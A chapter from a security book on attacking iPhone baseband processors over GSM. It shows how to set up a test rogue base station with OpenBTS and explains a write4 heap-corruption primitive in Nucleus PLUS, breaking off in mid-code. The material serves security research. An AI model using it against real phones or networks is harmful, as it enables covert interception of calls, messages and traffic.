Chapter 11
Baseband Attacks
The communication stack for cellular networks in iOS devices runs on a dedicated chip, the so-called digital baseband processor. Having control over the baseband side of an iPhone allows an adversary to perform a variety of interesting attacks related to the “phone” part of a device, such as monitoring incoming and outgoing calls, placing calls, sending and intercepting short messages, and intercepting IP traffic, as well as turning the iPhone into a remotely activated microphone by enabling its capability to auto-answer incoming calls. This chapter explores how memory corruptions can be triggered in the baseband software stack and how an attacker can execute custom code on the baseband processor. To attack a device over the air, an adversary would operate a rogue base station close enough to the target device for the two to communicate (see Figure 11.1).
But baseband attacks do not necessarily need to be remote attacks. For a long time, the driving factor for memory corruption research in the baseband stack was the demand for unlocking iPhones: in many countries, iPhones are sold at a subsidized price when users buy them bundled with a long-term carrier contract. The downside of this practice is that the phone works only with SIM cards from the carrier that sold it. This check, the network lock, is enforced by the baseband processor, which is the component that talks to the SIM card. The memory corruptions exploited in this context are called local vulnerabilities, in contrast to vulnerabilities that can be exploited over the air.
This chapter is concerned only with attacks over the Global System for Mobile Communications (GSM) air interface and with local attacks through the AT command parser. Although attacks over the Code Division Multiple Access (CDMA) air interface might in principle be possible as well, hardware and software for setting up rogue CDMA base stations are much harder to acquire, and attacks against the Qualcomm CDMA stack have so far neither been studied by us nor publicly demonstrated by anyone else. Similarly, although later-generation cellular networks such as the Universal Mobile Telecommunications System (UMTS) and Long Term Evolution (LTE) provide a much richer attack surface, they are not considered in this chapter.
But before getting to the gist of the attacks we describe, we take a brief look at the target environment. Just like the application processor, the baseband processor is an ARM-based CPU; however, it does not run iOS but rather a dedicated real-time operating system (RTOS). Different generations of iPhones and iPads use different baseband processors and RTOSes. Table 11.1 gives an overview of which one is used in which device.
Processor | Devices | RTOS
Infineon S-Gold 2 (ARM 926) | iPhone 2G | Nucleus PLUS (Mentor Graphics)
Infineon X-Gold 608 (ARM 926) | iPhone 3G/3GS, iPad 3G (GSM) | Nucleus PLUS (Mentor Graphics)
Infineon X-Gold 618 (ARM 1176) | iPhone 4, iPad 2 3G (GSM) | ThreadX (Express Logic)
Qualcomm MDM6600 (ARM 1136) | iPhone 4 (CDMA), iPad 2 3G (CDMA) | REX on OKL4 (Qualcomm)
Qualcomm MDM6610 (variation of MDM6600) | iPhone 4S | REX on OKL4 (Qualcomm)
GSM is a suite of standards for digital cellular communications. It was developed in the 1980s by the European Conference of Postal and Telecommunications Administrations (CEPT); in 1992, development was moved to the European Telecommunications Standards Institute (ETSI). GSM is considered a second-generation wireless telephony technology and serves more than two billion cellular subscribers in more than 200 countries.
The International Telecommunication Union (ITU) has assigned a total of 14 different frequency bands to the GSM technology; however, only four of them are relevant. In North America, GSM-850 and GSM-1900 are used. In the rest of the world, with the exception of South and Central America, GSM-900 and GSM-1800 are used. In South America, GSM-850 and GSM-1900 are primarily used; however, there are a number of exceptions. All of the GSM-enabled iOS devices are quad-band devices supporting GSM-850, GSM-900, GSM-1800, and GSM-1900. Regardless of where you turn on your device, all channels on all four bands are scanned for valid signals.
Let us now quickly dissect the GSM protocol stack. On the physical layer, GSM uses Gaussian Minimum Shift Keying (GMSK) as its modulation scheme; the channels are 200 kHz wide, and the bit rate is approximately 270.833 kbit/s. Both Frequency Division Multiple Access (FDMA) and Time Division Multiple Access (TDMA) are employed. To enable simultaneous sending and receiving, a technique called Frequency Division Duplex is used: transmission between the Mobile Station (MS) and the Base Transceiver Station (BTS) takes place on two different frequencies separated by a fixed duplex distance for each band. Data transmitted from the MS to the BTS is sent on the uplink; the opposite direction is called the downlink. On top of the physical channels defined by this TDMA scheme, layer 1 of the air interface defines a number of logical channels that are multiplexed onto the physical channels. Many different types of logical channels exist, which we do not describe in further detail here, but they can be neatly split into two categories: traffic channels, which transport user data, and signaling channels, which transport signaling information such as location updates between the BTS and the MS.
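As a quick sanity check of the physical-layer figures above, the following sketch derives the bit period, timeslot length, and TDMA frame length from the bit rate. It assumes two standard GSM parameters that this chapter does not state: the bit rate is exactly 13 MHz / 48, and each timeslot lasts 156.25 bit periods, with eight timeslots per TDMA frame.

```python
from fractions import Fraction

# Assumption: GSM bit rate is exactly 13 MHz / 48 (about 270.833 kbit/s)
BIT_RATE = Fraction(13_000_000, 48)              # bits per second
BIT_PERIOD_US = Fraction(1_000_000) / BIT_RATE   # microseconds per bit

# Assumption: 156.25 bit periods per timeslot, 8 timeslots per TDMA frame
BITS_PER_TIMESLOT = Fraction(625, 4)
TIMESLOTS_PER_FRAME = 8

timeslot_us = BITS_PER_TIMESLOT * BIT_PERIOD_US
frame_us = TIMESLOTS_PER_FRAME * timeslot_us

print(f"bit rate : {float(BIT_RATE) / 1000:.3f} kbit/s")
print(f"bit      : {float(BIT_PERIOD_US):.3f} us")
print(f"timeslot : {float(timeslot_us):.2f} us")
print(f"frame    : {float(frame_us) / 1000:.3f} ms")
```

Using exact fractions keeps the results exact: a timeslot is 7500/13 µs (about 576.9 µs) and a TDMA frame is 60000/13 µs (about 4.615 ms).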
Going up the GSM protocol stack on the Um interface, you arrive at layer 2, where LAPDm, a derivative of ISDN's LAPD (ITU Q.921) that is reminiscent of HDLC, is spoken. Data transmitted on layer 2 is encapsulated either in unnumbered information frames (if acknowledgment, flow control, and layer 2 error correction are not needed) or in information frames (positive acknowledgment, flow control, and layer 2 error control provided). A layer 2 Connection End Point (CEP) is denoted by so-called Data Link Connection Identifiers (DLCI), which consist of two elements: a Service Access Point Identifier (SAPI) and a Connection Endpoint Identifier (CEPI).
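The SAPI part of the DLCI travels in the one-octet LAPDm address field at the start of every frame. The following sketch packs and unpacks that octet. The bit layout (EA in bit 1, C/R in bit 2, SAPI in bits 3 to 5, LPD in bits 6 and 7, bit 8 spare) is taken from the LAPDm specification, 3GPP TS 44.006, not from this chapter; SAPI 0 carries RR, MM, and CC signaling, and SAPI 3 carries SMS.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class LapdmAddress:
    sapi: int  # Service Access Point Identifier (0: signaling, 3: SMS)
    cr: int    # command/response bit
    lpd: int   # link protocol discriminator (0 for normal GSM use)
    ea: int    # address extension bit (1 = this is the last address octet)


def parse_address(octet: int) -> LapdmAddress:
    """Split a LAPDm address octet into its fields (bit 1 is the LSB)."""
    if not 0 <= octet <= 0xFF:
        raise ValueError("the LAPDm address field is a single octet")
    return LapdmAddress(
        sapi=(octet >> 2) & 0x7,
        cr=(octet >> 1) & 0x1,
        lpd=(octet >> 5) & 0x3,
        ea=octet & 0x1,
    )


def build_address(sapi: int, cr: int, lpd: int = 0) -> int:
    """Build an address octet with EA set (single-octet address)."""
    return ((lpd & 0x3) << 5) | ((sapi & 0x7) << 2) | ((cr & 0x1) << 1) | 0x1


addr = build_address(sapi=3, cr=1)  # an SMS frame with the C/R bit set
print(hex(addr), parse_address(addr))
```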
The next layer of the cellular stack is layer 3, which is divided into three sublayers: Radio Resource Management (RR), Mobility Management (MM), and Connection Management (CM). The RR layer is responsible for the establishment of a link between the MS and the MSC and allocates and configures dedicated channels for this. The MM layer handles all aspects related to the mobility of the device, such as location management, but also authentication of the mobile subscriber. The CM layer can again be split into three distinct sublayers, which are not stacked on top of each other but rather are side by side: Call Control (CC) is the sublayer responsible for functions such as call establishment and teardown. The other sublayers are Supplementary Services (SS) and Short Message Service (SMS). The last two sublayers are independent of calls. See Figure 11.2 for an overview of the GSM Um interface as served by the cellular stack running on the baseband processor.
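On the wire, the receiving side tells these sublayers apart by the protocol discriminator (PD) in the low nibble of the first octet of every layer 3 message; the second octet carries the message type. The sketch below shows that dispatch step. The PD values and the CC SETUP message type 0x05 come from 3GPP TS 24.007/24.008 rather than from this chapter, and the function name classify_l3 is purely illustrative.

```python
from typing import Tuple

# Protocol discriminator values for the layer 3 sublayers named above
# (assumed from 3GPP TS 24.007; other PDs exist but are not listed).
PROTOCOL_DISCRIMINATORS = {
    0x3: "CC",   # Call Control
    0x5: "MM",   # Mobility Management
    0x6: "RR",   # Radio Resource Management
    0x9: "SMS",  # Short Message Service
    0xB: "SS",   # Supplementary Services (non-call-related)
}


def classify_l3(msg: bytes) -> Tuple[str, int, int]:
    """Return (sublayer, upper nibble of octet 1, raw message-type octet)."""
    if len(msg) < 2:
        raise ValueError("a layer 3 message header has at least two octets")
    pd = msg[0] & 0x0F
    # Upper nibble: skip indicator for RR/MM, transaction identifier for CC/SS/SMS
    upper = msg[0] >> 4
    sublayer = PROTOCOL_DISCRIMINATORS.get(pd, "unknown (PD %#x)" % pd)
    return sublayer, upper, msg[1]


# Header of a CC SETUP message (PD 0x3, message type 0x05), transaction identifier 0
print(classify_l3(bytes([0x03, 0x05])))  # ('CC', 0, 5)
```

The message-type octet is returned raw because, for MM and CC messages, its top bits may carry a sequence number in later protocol versions.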
In recent years, two open-source projects have appeared that build solutions for setting up and running GSM networks. This has significantly lowered the entry cost for GSM security research; in fact, one could say that this was the key event that made baseband attacks practical for the average hacker. Although the two projects, OpenBSC and OpenBTS, have similar goals, they take different approaches. Whereas OpenBSC uses existing, commercially available GSM base transceiver stations (BTSes) and acts as a base station controller (BSC), OpenBTS uses a software-defined radio, the USRP platform, to run a GSM base station completely in software, including modulation and demodulation. OpenBTS reduces the hardware cost of running a GSM base station to less than USD 2000. Next, we detail how to set up your own little GSM network for testing purposes.
OpenBTS uses a software-defined radio approach to implement the BTS side of the Um interface. To operate a GSM network with OpenBTS, you currently need a Universal Software Radio Peripheral (USRP) by Ettus Research, LLC (now owned by National Instruments); in the future, OpenBTS might support additional software-defined radios. A USRP contains several analog-to-digital converters (ADCs) and digital-to-analog converters (DACs) connected to an FPGA, which in turn communicates with the host computer through a USB or a Gigabit Ethernet interface, depending on the model. The actual RF hardware is contained in so-called daughterboards that are mounted onto the USRP mainboard. Ettus sells several transceiver daughterboards covering the GSM frequency ranges, namely the RFX900 covering 750MHz to 1050MHz, the RFX1800 covering 1.5GHz to 2.1GHz, and the WBX board covering 50MHz to 2.2GHz. All of these daughterboards can send and receive at the same time. Note, however, that when the USRP is operated with a single daughterboard, significant leakage of the transmitted signal into the receive circuit occurs, effectively limiting the range of your system. The recommended configuration is to run OpenBTS with two RFX daughterboards. Also note that RFX1800 daughterboards can be converted into RFX900 daughterboards simply by reflashing their EEPROM. However, RFX900 daughterboards contain a filter that suppresses signals outside the 900MHz ISM band (902–928 MHz). Therefore, if you bought an RFX900 daughterboard for the transmit side, you either need to remove the ISM filter by desoldering it or restrict yourself to ARFCNs 975–988 in the EGSM900 band.
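The ARFCN 975–988 restriction follows from the channel-to-frequency mapping: the BTS transmits on the downlink, so the whole 200 kHz downlink channel must fit inside 902–928 MHz. The sketch below computes uplink and downlink carriers for an ARFCN and checks the filter constraint. The per-band formulas and duplex distances are assumed from 3GPP TS 45.005 rather than from this chapter, and the function names are illustrative.

```python
CHANNEL_HALF_WIDTH_KHZ = 100          # GSM channels are 200 kHz wide
ISM_900_KHZ = (902_000, 928_000)      # band passed by the RFX900 ISM filter


def arfcn_to_khz(arfcn, band):
    """Return (uplink, downlink) carrier frequencies in kHz for an ARFCN.

    The band must be given explicitly because ARFCNs 512-810 exist in both
    GSM-1800 and GSM-1900.
    """
    if band == 850 and 128 <= arfcn <= 251:
        uplink, duplex = 824_200 + 200 * (arfcn - 128), 45_000
    elif band == 900 and 0 <= arfcn <= 124:
        uplink, duplex = 890_000 + 200 * arfcn, 45_000
    elif band == 900 and 975 <= arfcn <= 1023:       # E-GSM extension
        uplink, duplex = 890_000 + 200 * (arfcn - 1024), 45_000
    elif band == 1800 and 512 <= arfcn <= 885:
        uplink, duplex = 1_710_200 + 200 * (arfcn - 512), 95_000
    elif band == 1900 and 512 <= arfcn <= 810:
        uplink, duplex = 1_850_200 + 200 * (arfcn - 512), 80_000
    else:
        raise ValueError(f"ARFCN {arfcn} is not valid in the GSM-{band} band")
    return uplink, uplink + duplex


def downlink_fits_ism(arfcn):
    """True if the whole 200 kHz downlink channel lies inside the ISM band."""
    _, downlink = arfcn_to_khz(arfcn, 900)
    low, high = ISM_900_KHZ
    return (low <= downlink - CHANNEL_HALF_WIDTH_KHZ
            and downlink + CHANNEL_HALF_WIDTH_KHZ <= high)


usable = [n for n in range(975, 1024) if downlink_fits_ism(n)]
print(arfcn_to_khz(975, 900), usable[0], usable[-1])  # (880200, 925200) 975 988
```

For comparison, the example configuration's default ARFCN 51 maps to a 945.2 MHz downlink, which lies outside the ISM band.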
Unfortunately, the internal clock of the USRP devices is too imprecise to allow reliable operation with anything but the most tolerant of cellphones. Additionally, operating the USRP at 64MHz for GSM isn't recommended; instead, you should use a multiple of the GSM symbol rate to make downsampling more efficient. Handsets usually achieve this with a reference clock of 13MHz (48 times the GSM bit rate) or 26MHz; for the USRP, the most common option is a 52MHz clock. You can deal with both of these issues by feeding an external clock signal to the USRP. Note that feeding an external clock to a USRP1 requires a reclocking modification of the USRP1 motherboard that involves some surface-mount soldering. These steps are described on the ClockTamer installation page (https://code.google.com/p/clock-tamer/wiki/ClockTamerUSRPInstallation). The ClockTamer is a small clock generator with optional GPS synchronization that is manufactured by a Russian company called FairWaves; at the same time, it is an open source hardware project. This module fits neatly into the USRP enclosure.
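To see why 52MHz is preferred over 64MHz, compare the ratio of each clock to the GSM symbol rate: only the multiples of 13MHz give an integer number of clock cycles per symbol. The sketch below checks just this arithmetic, assuming the symbol rate is exactly 13 MHz / 48; it deliberately ignores the actual decimation chain inside the USRP.

```python
from fractions import Fraction

GSM_SYMBOL_RATE = Fraction(13_000_000, 48)  # about 270.833 ksymbol/s (assumed exact)


def samples_per_symbol(clock_hz):
    """Clock cycles per GSM symbol; an integer ratio keeps resampling simple."""
    return Fraction(clock_hz) / GSM_SYMBOL_RATE


for clock_mhz in (13, 26, 52, 64):
    sps = samples_per_symbol(clock_mhz * 1_000_000)
    kind = "integer" if sps.denominator == 1 else "non-integer"
    print(f"{clock_mhz:>2} MHz: {float(sps):9.3f} cycles per symbol ({kind})")
```

With a 52MHz clock the ratio is exactly 192, whereas 64MHz yields roughly 236.3, which forces fractional resampling.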
For newer USRPs, such as the USRP2, E1x0, N2x0, and B1x0, reclocking modifications are not necessary; the clock signal can simply be fed into the external clock input. Note, however, that to operate these you need a version of OpenBTS that supports UHD devices.
We show you how to install OpenBTS and set up a minimal configuration for playing the role of a malicious base station. The accompanying materials for this book (www.wiley.com/go/ioshackershandbook) include a VirtualBox image that installs all of the dependencies required to operate a USRP1 with a 52MHz clock on first boot and then can be used as a self-contained playground for testing baseband attacks.
The following is a unified diff between the example configuration included in the OpenBTS 2.6 distribution and the configuration used later in this chapter:
--- OpenBTS.config.example 2012-03-12 11:20:43.993739075 +0100
+++ OpenBTS.config 2012-03-12 11:31:27.029729225 +0100
@@ -30,3 +30,3 @@
 # The initial global logging level: ERROR, WARN, NOTICE, INFO, DEBUG, DEEPDEBUG
-Log.Level NOTICE
+Log.Level INFO
 # Logging levels can also be defined for individual source files.
@@ -86,4 +86,4 @@
 # YOU MUST HAVE A MATCHING libusrp AS WELL!!
-TRX.Path ../Transceiver/transceiver
-#TRX.Path ../Transceiver52M/transceiver
+#TRX.Path ../Transceiver/transceiver
+TRX.Path ../Transceiver52M/transceiver
 $static TRX.Path
@@ -182,3 +182,3 @@
 # Things to query during registration updates.
-#Control.LUR.QueryIMEI
+Control.LUR.QueryIMEI
 $optional Control.LUR.QueryIMEI
@@ -197,3 +197,3 @@
 # Maximum allowed ages of a TMSI, in hours.
-Control.TMSITable.MaxAge 72
+Control.TMSITable.MaxAge 24
@@ -259,3 +259,3 @@
 # Location Area Code, 0-65535
-GSM.LAC 1000
+GSM.LAC 42
 # Cell ID, 0-65535
@@ -286,5 +286,5 @@
 # Valid ARFCN range depends on the band.
-GSM.ARFCN 51
+#GSM.ARFCN 51
 # ARCN 975 is inside the US ISM-900 band and also in the GSM900 band.
-#GSM.ARFCN 975
+GSM.ARFCN 975
 # ARFCN 207 was what we ran at BM2008, I think, in the GSM850 band.
@@ -295,3 +295,3 @@
 # Should probably include our own ARFCN
-GSM.Neighbors 39 41 43
+GSM.Neighbors 39 41 975
 #GSM.Neighbors 207
Please take care to adjust GSM.ARFCN, GSM.Band, and GSM.Neighbors according to the frequency that you have been authorized to transmit on.
Note that by default you are running OpenBTS in a so-called open configuration, meaning that any mobile device that tries to register with the test network will be allowed to do so. This may have unwanted side effects, especially if you have not properly limited your transmission power or are in an area where other networks have only weak signals: devices may inadvertently roam into your network. To prevent this, you can run OpenBTS in a closed configuration that requires each IMSI to be registered with Asterisk.
After having connected your hardware, you should perform a simple check to see whether everything is set up correctly. For this test, you can use the testcall functionality that you will later also use to transmit raw GSM layer 3 messages. First, install the libmich library (from https://github.com/mitshell/libmich, not required if you use the virtual machine provided), a nifty library to create layer 3 messages using a Python interface. Next, start OpenBTS and register your iPhone with the test network. To select the test network, disable the automatic selection of the network in the Carrier section of the Settings application and choose the mobile network with the name 00101.
If you have trouble seeing or registering with your test network, it can help to put the iPhone into airplane mode for at least 5 seconds. Disable airplane mode after that and perform the network selection procedure again; your phone will now perform a full scan.
After having registered with the network, you can simulate the first stage of a call establishment. Use the following commands to set up a traffic channel to the iPhone:
OpenBTS> tmsis
TMSI       IMSI            IMEI(SV)         age  used
0x4f5e0ccc 262XXXXXXXXXXXX 01XXXXXXXXXXXXXX 293s 293s
1 TMSIs in table
OpenBTS> testcall 262XXXXXXXXXXXX 60
OpenBTS> calls
1804289383 TI=(1,0) IMSI=262XXXXXXXXXXXX Test from=0 Q.931State=active SIPState=Null (2 sec)
1 transactions in table
In the previous example, the tmsis command shows a mapping of the Temporary Mobile Subscriber Identity (TMSI) of the registered iPhone to its International Mobile Subscriber Identity (IMSI), together with the International Mobile Equipment Identity and Software Version (IMEISV), as well as the time of initial registration and the time of last use. The testcall command opens a UDP socket (by default on port 28670) and a traffic channel to the mobile device whose IMSI is given as the first argument. The second argument specifies the number of seconds this channel should be held open. This allows you to send datagrams to the UDP port that are forwarded as GSM layer 3 packets to the mobile device, and vice versa. Only a single testcall instance can be active at any time. To see which calls are established, you can use the calls command.
You then run the following simple Python script in another terminal to simulate call setup:
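import socket
# libmich (a Python 2 library) provides layer 3 message builders in L3Mobile
from libmich.formats import *

TESTCALL_PORT = 28670  # default UDP port opened by the OpenBTS testcall command

tcsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Serialize a call control SETUP message and hand it to OpenBTS, which
# forwards it to the phone over the traffic channel opened by testcall
tcsock.sendto(str(L3Mobile.SETUP()), ('127.0.0.1', TESTCALL_PORT))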
After you execute this script, your iPhone should ring. Note that the script does not follow up with the state transitions that would normally come after the initial call setup message; hence, the phone will appear to be frozen while ringing. Simply shut down OpenBTS once this test has worked.
You did not have to configure Asterisk in the previous description because you were operating OpenBTS in open configuration. If you want to operate OpenBTS in closed configuration or make calls between multiple phones registered on your test network, you need at least a basic Asterisk configuration. As a bare minimum, you can simply append the following lines to the default extensions.conf:
[sip-openbts]
exten => 6666,1,Dial(SIP/IMSI2620XXXXXXXXXXX)
exten => 7777,1,Dial(SIP/IMSI2620YYYYYYYYYYY)
and the following lines to the default sip.conf:
[IMSI2620XXXXXXXXXXX]
callerid=6666
canreinvite=no
type=friend
context=sip-openbts
allow=gsm
host=dynamic

[IMSI2620YYYYYYYYYYY]
callerid=7777
canreinvite=no
type=friend
context=sip-openbts
allow=gsm
host=dynamic
Please make sure that both the context and the IMSI identifiers match between sip.conf and extensions.conf.
The cellular baseband of a modern smartphone can be seen as an independent subsystem: it runs its own operating system on its own processor with dedicated coprocessors (for example, DSPs, crypto, and 3G coprocessors). This can be attributed to the real-time requirements of cellular communications. Consequently, the operating systems running underneath the cellular stack are dedicated real-time operating systems, sometimes proprietary to the vendor of the baseband stack, as in the case of Qualcomm's REX. More commonly, however, the vendor of the cellular stack has simply licensed a commercially available RTOS on which to run the stack. The primary task of these operating systems is to manage resources such as processors, memory, and attached devices efficiently and under real-time constraints, which often makes them appear quite different from a desktop operating system, although fundamentally they are not.
The following sections give you a brief exposition of the three different real-time operating systems that are in use by different versions of iOS devices. They also explain how task/thread control, inter-task/thread communication and locking mechanisms, memory management, and memory protection work for each of them.
Nucleus PLUS is a widely used commercial RTOS distributed by Mentor Graphics. It is shipped in source form to paying licensees. The basebands of both the S-Gold 2 and the X-Gold 608 run on Nucleus PLUS. Unfortunately, no good public documentation on Nucleus PLUS is available; however, the official manuals have leaked.
Units of execution in Nucleus PLUS are called tasks. Tasks can be dynamically created and deleted, and each runs at a priority defined at task creation time. Tasks that share a priority level are time-sliced in a round-robin fashion; they can also explicitly relinquish the processor. Tasks can preempt other tasks that have a lower priority. Preemption can be disabled, not only globally but also for each task individually. Interrupt Service Routines (ISRs) are a different kind of execution unit, and several types of them are distinguished. The first kind is the User ISR, which cannot use any Nucleus PLUS services and must itself save and restore the registers it uses. User ISRs are tied directly to an interrupt vector and are not registered through Nucleus PLUS. Next are low-level ISRs (LISRs), which are first-level interrupt handlers, and high-level ISRs (HISRs), which are second-level interrupt handlers. LISRs have only limited access to Nucleus PLUS services and are tied to an interrupt vector, whereas HISRs are scheduled similarly to tasks and may call most of the Nucleus PLUS services.
Nucleus PLUS distinguishes two different kinds of memory allocations: partition memory and dynamic memory. Both types of memory are managed in memory pools that need to be defined before allocations can be taken from them. Tasks can be suspended when an allocation cannot be performed immediately, causing them to wait until a suitable chunk of memory becomes free. Partition memory allows allocations only in fixed-size blocks: each call to the allocation function obtains one block of exactly that size from the pool. This type of memory management is very common in embedded systems with real-time constraints because it allows allocations to complete in constant time. Moreover, partition memory is more space-efficient because there is no need to store allocation metadata for the blocks. Dynamic memory, on the other hand, allows variable-size allocations from the pool, similar to a regular malloc() implementation. (Please also consult the “Heap Implementations” section later in this chapter for the internals of the heap implementations.)
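The constant-time property of partition memory is easy to see in a minimal model. The following sketch is a generic fixed-size block pool, not Nucleus PLUS code: the class name PartitionPool and its methods are hypothetical, and free blocks are tracked as a stack of indices so that allocation and release each take O(1) time regardless of pool size.

```python
class PartitionPool:
    """Generic fixed-size block pool (an illustration, not Nucleus PLUS code).

    Free blocks are tracked as a stack of block indices, so both allocate()
    and deallocate() run in constant time regardless of pool size.
    """

    def __init__(self, block_size, num_blocks):
        self.block_size = block_size
        self.memory = bytearray(block_size * num_blocks)
        # Push indices in reverse so that block 0 is handed out first.
        self._free = list(range(num_blocks - 1, -1, -1))

    def allocate(self):
        """Return the offset of a free block, or None if the pool is exhausted."""
        if not self._free:
            return None  # an RTOS could suspend the calling task here instead
        return self._free.pop() * self.block_size

    def deallocate(self, offset):
        if offset % self.block_size or not 0 <= offset < len(self.memory):
            raise ValueError("offset is not a block boundary of this pool")
        self._free.append(offset // self.block_size)


pool = PartitionPool(block_size=64, num_blocks=4)
a, b = pool.allocate(), pool.allocate()
pool.deallocate(a)
print(a, b, pool.allocate())  # 0 64 0
```

Because every block has the same size, no search and no splitting or merging is ever needed, which is exactly what makes the execution time predictable.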
For task synchronization and mutual exclusion, semaphores can be used; the semaphores implemented by Nucleus PLUS are counting semaphores.
Several means exist for tasks to communicate with each other. Mailboxes, which can be dynamically created and deleted, are the most primitive means of data transfer: each mailbox can hold only a single message consisting of exactly four 32-bit words. Pipes and queues are more powerful: they can hold multiple messages, each consisting of one or more bytes (pipes) or one or more 32-bit words (queues). Both variable-length and fixed-length pipes and queues can be created; their type is defined at creation time. Messages are sent and received by value, not by reference. Broadcast messages are supported as well, in which case all tasks waiting for a message from a queue wake up and receive it.
Other concepts for signaling and synchronization between tasks supported by Nucleus PLUS are event groups and signals. Both, however, have extremely limited bandwidth.
ThreadX is the direct successor of Nucleus PLUS; both operating systems were written by the same software engineer, William Lamie. Just like Nucleus PLUS, ThreadX is distributed to licensees in source form, but by a different company, Express Logic. Compared to Nucleus PLUS, the API is significantly less complex, and the interrupt architecture was overhauled. In contrast to the other operating systems described in this chapter, ThreadX is covered by a good book that describes its implementation in detail: Real-Time Embedded Multithreading: Using ThreadX and ARM by Edward L. Lamie (CMP, 2005, ISBN 1578201349). Due to this fact and its close relation to Nucleus PLUS, we do not further describe its idiosyncrasies in this chapter.
Real-time Executive System (REX) is an RTOS developed by Qualcomm for its Mobile Station Modem (MSM) products. It is employed by the Advanced Mobile Subscriber Software (AMSS) running on the MDM66x0 chips. Beginning in late 2006, Qualcomm made a major design change to its cellular stack: an L4-derived microkernel, OKL4, was placed underneath REX. Luckily, some versions of OKL4 are freely available in source form, which significantly simplifies the analysis of AMSS.
OKL4 is merely the microkernel of the system. The actual meat of the operating system, such as virtual memory management and process management, is implemented in Iguana, an L4 server, for which source code is freely available. The unit of execution in Iguana and L4 is called a thread. In fact, Iguana threads are L4 threads and can be manipulated through the L4 API as well as through an Iguana API.
Iguana uses a single address space to make sharing of data efficient and employs per-process protection domains to enforce its security policy. A protection domain can be seen as the equivalent of a process in a traditional operating system and defines what resources a process can access.
Memory sections are contiguous ranges of virtual pages; they are the basic units of virtual memory allocation and protection in Iguana. Memory sections can be created both at boot time and at run time using memsection_create().
A significant difference between OKL4/Iguana and the other operating systems discussed in this chapter is that only the operating system and not the actual application — in our case the cellular stack — runs in supervisor mode. AMSS, including drivers, is completely run in user mode.
This section dives head first into the internals of the operating systems' heap memory management. You should already be somewhat familiar with exploiting heap buffer overflows to make use of the information presented here.
Nucleus PLUS uses a simplistic first-fit allocator for managing dynamic memory. For each pool created using NU_Create_Memory_Pool(), a pool control block of the following layout is created:
struct dynmem_pcb {
    void     *cs_prev;
    void     *cs_next;
    uint32_t  cs_prio;
    void     *tc_tcb_ptr;
    uint32_t  tc_wait_flag;
    uint32_t  id;                    /* magic value ['DYNA'] */
    char      name[8];               /* Dynamic Pool name */
    void     *start_addr;            /* Starting pool address */
    uint32_t  pool_size;             /* Size of pool */
    uint32_t  min_alloc;             /* Minimum allocate size */
    uint32_t  available;             /* Total available bytes */
    struct dynmem_hdr *memory_list;  /* Memory list */
    struct dynmem_hdr *search_ptr;   /* Search pointer */
    uint32_t  fifo_suspend;          /* Suspension type flag */
    uint32_t  num_waiting;           /* Number of waiting tasks */
    void     *waiting_list;          /* Suspension list */
};
Each chunk of memory allocated with NU_Allocate_Memory() has a header of the following structure (16 bytes):
struct dynmem_hdr {
    struct dynmem_hdr *next_blk,   /* Next memory block */
                      *prev_blk;   /* Previous memory block */
    bool               is_free;    /* Memory block free flag (padded to 4 bytes) */
    struct dynmem_pcb *pool_pcb;   /* Dynamic pool pointer */
};
Before dynamic memory can be allocated, at least one pool needs to be created with NU_Create_Memory_Pool(pcb, name, start_addr, size, min_alloc, suspend_t).
This call initializes the pcb, placing a single chunk of size pool_size - 2 * sizeof(struct dynmem_hdr) in the cyclic list pointed to by pcb->memory_list.
Allocating a chunk of memory with NU_Allocate_Memory(pcb, &ptr_to_allocation, size, NU_NO_SUSPEND) then causes the allocator to walk this cyclic list in first-fit fashion until it finds a free chunk that is large enough for the request.
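The following sketch models such a first-fit search over a cyclic list of 16-byte headers, including splitting off the unused tail of an oversized chunk. It is a simplified illustration under assumptions, not the actual NU_Allocate_Memory code: the 4-byte rounding, the split threshold (min_alloc plus one header), and how search_ptr is advanced are assumptions, and the class names are hypothetical.

```python
HDR = 16  # sizeof(struct dynmem_hdr) as given in the text


class Block:
    """Python stand-in for struct dynmem_hdr; addr is the header address."""

    def __init__(self, addr, is_free):
        self.addr, self.is_free = addr, is_free
        self.next = self.prev = self

    def size(self):
        # Usable bytes between this header and the next one
        return self.next.addr - self.addr - HDR


class DynamicPool:
    def __init__(self, start, pool_size, min_alloc):
        self.min_alloc = min_alloc
        first = Block(start, True)
        end = Block(start + pool_size - HDR, False)  # sentinel, never free
        first.next = first.prev = end
        end.next = end.prev = first
        self.search_ptr = first
        self.available = pool_size - 2 * HDR

    def allocate(self, size):
        size = max((size + 3) & ~3, self.min_alloc)  # rounding rule is assumed
        blk = self.search_ptr
        while not (blk.is_free and blk.size() >= size):  # first fit
            blk = blk.next
            if blk is self.search_ptr:
                return None  # went full circle without finding a fit
        if blk.size() - size >= self.min_alloc + HDR:
            # Split: the unused tail becomes a new free block after blk
            rest = Block(blk.addr + HDR + size, True)
            rest.next, rest.prev = blk.next, blk
            blk.next.prev = rest
            blk.next = rest
            self.available -= size + HDR
        else:
            self.available -= blk.size()
        blk.is_free = False
        self.search_ptr = blk.next  # assumed: resume the next search here
        return blk.addr + HDR       # caller gets the memory after the header


pool = DynamicPool(start=0x1000, pool_size=0x200, min_alloc=16)
print(hex(pool.allocate(10)), hex(pool.allocate(100)), pool.available)
```

Note that every allocated chunk is immediately followed by the header of its neighbor, which is why a linear overflow out of one chunk lands in the next dynmem_hdr.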
To deallocate a memory block using NU_Deallocate_Memory(blk), the deallocation function assumes that blk is preceded by a dynmem_hdr.
No checks are performed on the dynmem_hdr structure itself, but it is checked that the pool pointer is not NULL, and that the magic value in the pool control block matches. After having marked the block as free again and having adjusted the number of available bytes in the pool, the function first checks whether the freed block can be merged with its previous block, then it checks whether it can be merged with the next block by looking at the is_free flags of the header of these blocks. This procedure is commonly called coalescing. This is the operation that gives an attacker a so-called unrestricted write4 primitive, a powerful way to turn a heap buffer overflow into the ability to write an arbitrary 32-bit value at any location in memory.
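The following sketch shows why coalescing yields a write4 primitive. It models memory as a flat byte array and performs the merge with the previous block and then with the next block, as described above, while checking only the pool pointer and its magic value. The field offsets, the encoding of the 'DYNA' magic, and the omitted bookkeeping (available bytes, search pointer) are assumptions; this is not the actual NU_Deallocate_Memory code. In the demo, an overflow has rewritten a block header so that prev_blk points at TARGET and next_blk holds VALUE.

```python
import struct

# Assumed byte offsets inside struct dynmem_hdr (16 bytes, 32-bit target)
NEXT, PREV, FREE, POOL = 0, 4, 8, 12
HDR_SIZE = 16
PCB_ID_OFFSET = 20                           # offset of dynmem_pcb.id
DYNA_MAGIC = int.from_bytes(b"DYNA", "big")  # assumed encoding of 'DYNA'


class Memory:
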